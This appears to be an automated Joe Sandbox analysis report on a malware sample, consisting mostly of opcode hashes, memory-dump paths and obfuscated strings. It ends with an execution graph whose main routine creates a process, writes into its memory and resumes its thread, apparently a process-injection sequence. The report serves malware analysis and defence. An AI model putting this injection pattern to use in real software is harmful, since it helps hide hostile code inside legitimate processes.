                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: UUUU
                                                                                  • API String ID: 0-1798160573
                                                                                  • Opcode ID: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                  • Instruction ID: 790960dc826ba515f374304ad24127e13dcb39a36aeb02f86586815ec94b777a
                                                                                  • Opcode Fuzzy Hash: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                  • Instruction Fuzzy Hash: BF21FC323705150BF79CE9398C1376B62D2DBC8264B18CA3DA6A6C72C1ED6CD9578285
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9f171fb69ca0f2ed4c3d19914428b9defe5770a552cf6ecd2dc7c4246d8a682
                                                                                  • Instruction ID: 34508bf953ddc7c0248ab9a9e4fbf7a4b1afa786f96444d3a9a216bd6f8ff86a
                                                                                  • Opcode Fuzzy Hash: b9f171fb69ca0f2ed4c3d19914428b9defe5770a552cf6ecd2dc7c4246d8a682
                                                                                  • Instruction Fuzzy Hash: 54423671900249DFDF29CF68C881AA97BB1FF08314F14825AFD699B291D735E9A1DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39dbe2aba88f9d11811e4dc6aa70dbdabafb0b3b74fa8fdf164f418612883361
                                                                                  • Instruction ID: 00b926c5f6c5bdb413bece2416ce306270ca5ffdb79c294c1c9a6dc1759d0aa4
                                                                                  • Opcode Fuzzy Hash: 39dbe2aba88f9d11811e4dc6aa70dbdabafb0b3b74fa8fdf164f418612883361
                                                                                  • Instruction Fuzzy Hash: 32022875900229DBDB64CFA5C884BEDB7F6FF48310F1481EEE859AB241D7349A85CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 496059e9654bb4327c1537d59ae9fcba2d088ba81316330b2626cae3cb6d61c4
                                                                                  • Instruction ID: d980fd519f7c95dad6e5be18ea2ace6cbd8530520ef98c255d4656d11be0e8ee
                                                                                  • Opcode Fuzzy Hash: 496059e9654bb4327c1537d59ae9fcba2d088ba81316330b2626cae3cb6d61c4
                                                                                  • Instruction Fuzzy Hash: 10A1AF37BA4B0907E30889EAACC6394B5C397D8354F6E423D8B75C73D2E9FC99168194
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7264ef9a1d20c920f4940a67a8554791b0b24340ae4dd46b09b0a5d526564939
                                                                                  • Instruction ID: e8b1470122b08f5c9c7f023ca67470f4b4ebd96add8a54f611aeb69a2c908a50
                                                                                  • Opcode Fuzzy Hash: 7264ef9a1d20c920f4940a67a8554791b0b24340ae4dd46b09b0a5d526564939
                                                                                  • Instruction Fuzzy Hash: 9D719E759141A58FCB0ACF6D88A01BDFFF4EF5A20072445AED8E2E7342D6744A12CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                  • Instruction ID: 3b81052f9ad4e8102e2952e3eba61bc8067273df4ae5f140bc5eab97f9ea483e
                                                                                  • Opcode Fuzzy Hash: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                  • Instruction Fuzzy Hash: BA51F2B2A106159BE75CCF5AC865269FFE2EBD1305B18C1BED1E7C7380D6749502EB10
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 537b80e03f894516b01569de0a92b02072133c8835f2cfb5ca97e1c6ee951038
                                                                                  • Instruction ID: 02e37f7446ee2e71a0a46c208a4c51749b7485b48476e9a0100131c1e93f6dc6
                                                                                  • Opcode Fuzzy Hash: 537b80e03f894516b01569de0a92b02072133c8835f2cfb5ca97e1c6ee951038
                                                                                  • Instruction Fuzzy Hash: F321F334D02209DFCB04EFA4C454BEDBBB2BB46301F6084AAD8046B391CB349E84CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a778d8f3d317d4595d7e58257667705a339ae63e4ead4c8d772323d500440465
                                                                                  • Instruction ID: 4060e8121907f3d521ae3a9028bf7e0b739e937bcf58a0e58c8f235aeaf0907f
                                                                                  • Opcode Fuzzy Hash: a778d8f3d317d4595d7e58257667705a339ae63e4ead4c8d772323d500440465
                                                                                  • Instruction Fuzzy Hash: 58115B2570A2C5CFCB4FC66D54D15ACBFD2EAEB00039846D8C986EF38BC4644919CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c80bb9cdb2e80480a53bbd02fdae8663ef8cbc0f65f40fb67fd823d7247ba4f9
                                                                                  • Instruction ID: 853540c2d2ccf7b22470551781f30321890aec58ad34d5d470c86a11d9dd0be3
                                                                                  • Opcode Fuzzy Hash: c80bb9cdb2e80480a53bbd02fdae8663ef8cbc0f65f40fb67fd823d7247ba4f9
                                                                                  • Instruction Fuzzy Hash: BB01BC767206068FD308CFA9FCC0A66B3A2FBD935170A8538DA01C3276DB34F520CA54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                  • Instruction ID: 1c8cf4990013556009a943ce68bbe5c533817c3d042a03847a5f6a4628de1edc
                                                                                  • Opcode Fuzzy Hash: cf104503c4d1f63e508e528481e2c1d582825b9df7b848c5f582128bf29b2c3b
                                                                                  • Instruction Fuzzy Hash: DA01E8326159308FA389DE3AC80144377E3FFCA32532AC1E5C945AB57DD6316847DB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                  • Instruction ID: e46ac8c8d649937048925bbc22b10e31c7d260e61c9919193dd0f57e0586c858
                                                                                  • Opcode Fuzzy Hash: d4540386dd2ecfa8358b54f970b731510518c9cc2a47fdc7166f1c0352bd1f31
                                                                                  • Instruction Fuzzy Hash: 75011E326019208FA38DCE3AC80545377E3FFCA325326C1E8D845AB579D6316802CBD4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: f961592b2f1d145e105b414baeb708aa2f288bac5fdf7e79b66c5d6e71879169
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: CEB09236E04008DADF008EC4B4413FCFB70F78232AF242163C619B3501823686685689
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: 2ada32c6dfefcc707ecd0da99efed46e99b652b66efdfa9fe9524fe429dd81ee
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: A1B0923AE040089ADB008ED8B4413FCFBB4F78622AF202563C618B350082318268568D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction ID: 4bd273165d5c8127b1bcd12174d887af657b53b97671f222263baf30ba6005c5
                                                                                  • Opcode Fuzzy Hash: 6f05c8a2bf2ccfa7098e7791fe1597f8093cffcd8f9d1c0d20381294cb12e732
                                                                                  • Instruction Fuzzy Hash: 51B09236E040089ADB008EC4B4413FCFB70F78632AF202063C619B3580823192685A89
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                                  • API String ID: 0-140969752
                                                                                  • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction ID: d7373e3886d299facb19fa38ffe25c07a9585a3c205d4b0bd5bec206062aa402
                                                                                  • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                                  • Instruction Fuzzy Hash: 8AF1F0209087E9D9DB32C6788C09BCDBEA45B23324F0442D9D1E87A2D2D7B54BC5CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @A$ AA$ BA$(@A$(AA$(BA$0@A$0AA$0BA$8@A$8AA$8BA$@@A$@AA$@BA$H@A$HAA$HBA$P@A$PAA$PBA$X@A$XAA$XBA$`@A$`AA$`BA$h?A$h@A$hAA$hBA$p?A$p@A$pAA$pBA$t?A$x?A$x@A$xAA$xBA$?A$?A$@A$@A$AA$AA
                                                                                  • API String ID: 0-2473593039
                                                                                  • Opcode ID: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction ID: cd2b09867844d9088b589d34e87405ba50e4b71092ccb6c344aac6b2ca440c4f
                                                                                  • Opcode Fuzzy Hash: 7a86c8557865365371fd70ba80b9ec5cf29cee4bf688fcc2242cc569f7caec83
                                                                                  • Instruction Fuzzy Hash: A9F127B08052699FDB21CF95D8487DEBFB0AB96308F5481CAD5593B241C7B90BC9CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ,&A$4'A$<&A$H&A$T&A$d&A$p&A$&A
                                                                                  • API String ID: 0-3237638986
                                                                                  • Opcode ID: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction ID: cff281b8a1f68f6b20df24dba5bb2c96452f51176c63915be19b708d1d432121
                                                                                  • Opcode Fuzzy Hash: 88ed99f36386e7362777411d84ae5ff3a990d4990d307b203149d78fed32b556
                                                                                  • Instruction Fuzzy Hash: 94415FB290022DAFDB20DF90DD85ADE3BA8EF14304F104566FD18E7191D7B89A98CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 5$H$O$b$i$}$}
                                                                                  • API String ID: 0-3760989150
                                                                                  • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction ID: 369aeaa7b9df4ee2e80a0e18e56acf55ccc4a241f882559222376cf1433086b7
                                                                                  • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                                  • Instruction Fuzzy Hash: A551D67180429DEEDB11CBA8CC80AEEBBBCEF49314F1442E9E555E6192D3349B84CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (A$4(A$<&A$H&A$d&A$t'A$'A
                                                                                  • API String ID: 0-2857912252
                                                                                  • Opcode ID: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction ID: 598e5e76edb8781625c522a77e101a858e117d1bda28810526bc6b189ef5091b
                                                                                  • Opcode Fuzzy Hash: 1dd3c48cf87e824894ac796b353b11c003e09e2c1ffeee2d2140970bcd4911b6
                                                                                  • Instruction Fuzzy Hash: AE516BB190025D9BDF24EF60DD859DD3BB8FF04308F14802AFD28A6151D7B599A9DF84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$X7A$`7A
                                                                                  • API String ID: 0-851144607
                                                                                  • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction ID: ec7159110686e017a53c04d8a7116cbfcaf3023df49cf86f8cfea5027d303b34
                                                                                  • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                                  • Instruction Fuzzy Hash: 704182B0655642EFC309CF2AC5846C1FBE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $/A$,/A$0/A$4/A$`7A
                                                                                  • API String ID: 0-2435369464
                                                                                  • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction ID: 05bbdd1307f7371415320b94ee924c87935ee6ecb305c500af30896fb1386503
                                                                                  • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                                  • Instruction Fuzzy Hash: 1F01F6B4000B55CAC721EF24D1806C6BBF4FB44305F10C90FE0AA8B204DBB8A29AEF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ^$^1A$^1A$b
                                                                                  • API String ID: 0-1727528133
                                                                                  • Opcode ID: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction ID: 8e778af74aab0de0cc63dcd7efb63cc437e880c2ecd4d4824484bcfa5b966ee7
                                                                                  • Opcode Fuzzy Hash: d589e5707e4d6ea81bb9d68796acfbad06745d6c061f5ce9fd65735b0fa530f5
                                                                                  • Instruction Fuzzy Hash: 1861BF71A00285EFDF14DF6AC881BADBBF1EF44310F2481E9E815AB292D735AE54DB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:5.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:5.6%
                                                                                  Total number of Nodes:376
                                                                                  Total number of Limit Nodes:23

                                                                                  Graph

                                                                                  execution_graph, rendered as a call list (function address, then the API block it reaches; "a / b" are two wrappers that reach the same API, and an address in brackets is an alternative intermediate block on the way to it):

                                                                                  • 6420e6 -> 64210c GetTextExtentPoint32W -> 642139
                                                                                  • 641162 -> 641197 WSAEventSelect -> 6411ce
                                                                                  • 6413e2 -> [641452] -> 64141a MapViewOfFile -> 641428
                                                                                  • 11a09a -> [11a107] -> 11a0cf recv -> 11a0dd
                                                                                  • 11a69a -> [11a6ef] -> 11a6c6 SetErrorMode -> 11a6db
                                                                                  • 6454ea -> 64553a K32GetModuleFileNameExW -> 645542
                                                                                  • 6426ea -> [642744] -> 642719 GetWindowPlacement -> 64272e
                                                                                  • 11b31e -> 11b356 LsaOpenPolicy -> 11b397
                                                                                  • 11b002 -> 11b037 GetTokenInformation -> 11b074
                                                                                  • 645172 -> [6451d2] -> 6451a7 NtQuerySystemInformation -> 6451bc
                                                                                  • 640b72 -> 640ba7 GetProcessTimes -> 640bd9
                                                                                  • 6400f2 -> 640142 OleGetClipboard -> 640150
                                                                                  • 644afe -> 644b33 RegSetValueExW -> 644b77
                                                                                  • 6416fe -> 64174e SHGetFolderPathW -> 64175c
                                                                                  • 645b7a -> [645bda] -> 645ba6 KiUserCallbackDispatcher -> 645bbb
                                                                                  • 4e8750 -> 4e877b -> 4ea6d0 and 4ea700 (two structurally identical copies of the routine 4ea730 .. 4eaa39, both returning to 4e89a9), each of which runs:
                                                                                    • 4ea730 -> 646906 / 6468e0 -> 646941 CreateProcessA -> 6469d8 -> 4ea892
                                                                                    • 4ea892 -> 646a6a -> [646acf] -> 646a99 NtResumeThread -> 4ea8c3
                                                                                    • 4ea8c3 -> 646ae5 / 646b12 -> [646b82] -> 646b4a NtWriteVirtualMemory -> 646b58 -> 4ea8de; the same NtWriteVirtualMemory wrapper pair is called again from 4ea8de -> 4ea91e (which also loops back to itself through it) -> 4ea9cd -> 4eaa0f
                                                                                    • 4eaa0f -> 646a6a NtResumeThread -> 4eaa2c -> 646a6a NtResumeThread -> 4eaa39 -> 4e89a9
